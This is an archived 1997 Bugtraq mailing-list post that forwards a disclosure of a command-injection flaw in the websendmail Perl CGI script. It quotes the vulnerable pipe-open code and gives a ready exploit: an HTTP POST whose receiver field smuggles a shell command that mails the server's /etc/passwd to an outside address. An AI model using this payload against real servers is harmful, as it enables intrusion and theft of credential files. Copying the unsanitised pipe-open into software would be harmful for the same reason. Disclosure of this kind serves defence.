Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1997_3

Bugtraq archives for 3rd quarter (Jul-Sep) 1997: Vulnerability in websendmail (fwd)

Vulnerability in websendmail (fwd)

Julian Assange (proffSUBURBIA.NET)
Tue, 8 Jul 1997 06:44:45 +1000

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: inter: "tar-error"
Previous message: Razvan Dragomirescu: "Vulnerability in websendmail"

>From best-of-security-requestsuburbia.net  Tue Jul  8 06:37:42 1997
Return-Path: <best-of-security-requestsuburbia.net>
Received: (from listlocalhost)
          by suburbia.net (8.8.4/8.8.4)
   id GAA11901 for proffsuburbia.net; Tue, 8 Jul 1997 06:37:42 +1000 (EST)
Received: (qmail 11893 invoked from network); 7 Jul 1997 20:37:36 -0000
Received: from pop3.kappa.ro (drazvan193.226.102.17)
  by suburbia.net with SMTP; 7 Jul 1997 20:37:36 -0000
Received: from localhost (drazvanlocalhost) by pop3.kappa.ro (8.8.5/8.7.3) with SMTP id XAA16131 for <best-of-securitysuburbia.net>; Mon, 7 Jul 1997 23:41:02 +0300
Date: Mon, 7 Jul 1997 23:41:02 +0300 (EET DST)
From: Razvan Dragomirescu <drazvankappa.ro>
To: best-of-securitysuburbia.net
Subject: Vulnerability in websendmail
Message-ID: <Pine.LNX.3.95.970707233511.16089C-100000pop3.kappa.ro>

Hi,

First, the story:

Websendmail is a cgi-bin that comes with the WEBgais package, which is
an interface to the GAIS search tool.
It is a PERL script that reads input from a form and sends e-mail to the
specified destination.
The version I am referring to is 1.0. It was released in 1995 but it is
still used (I've just tested it :) ).

As many other cgi-bin programs, this one does not check for special
characters in the user input.

Here's what it does:
(...)
$cmd="| $MAILBIN $VAR_receiver";
open (PIPEOUT, $cmd);

$VAR_receiver is read from the form. The script also does a little parsing
on the string to "un-webify" it (converts pluses to spaces and %xx
characters to their real value).
So if we set $VAR_receiver to
';mail+your_address\somewhere.org</etc/passwd;'
it will do the job.

Now for the exploit:

telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the
string passed to the server, in this case xxx=90)

receiver=;mail+your_address\somewhere.org</etc/passwd;&sender=a&rtnaddr=a&subject=a
&content=a

Don't worry if the server displays an error message. The password file is
on the way :).

You can use anything for the "sender", "rtnaddr", "subject" and "content",
just make sure they're there, the script checks for them.

That would be all.

I'm expecting to hear from you.

Be good.
Razvan

--
Razvan Dragomirescu
drazvankappa.ro, drazvanromania.ro, drazvanroedu.net
Phone: +40-1-6866621
"Smile, tomorrow will be worse" (Murphy)

Next message: inter: "tar-error"
Previous message: Razvan Dragomirescu: "Vulnerability in websendmail"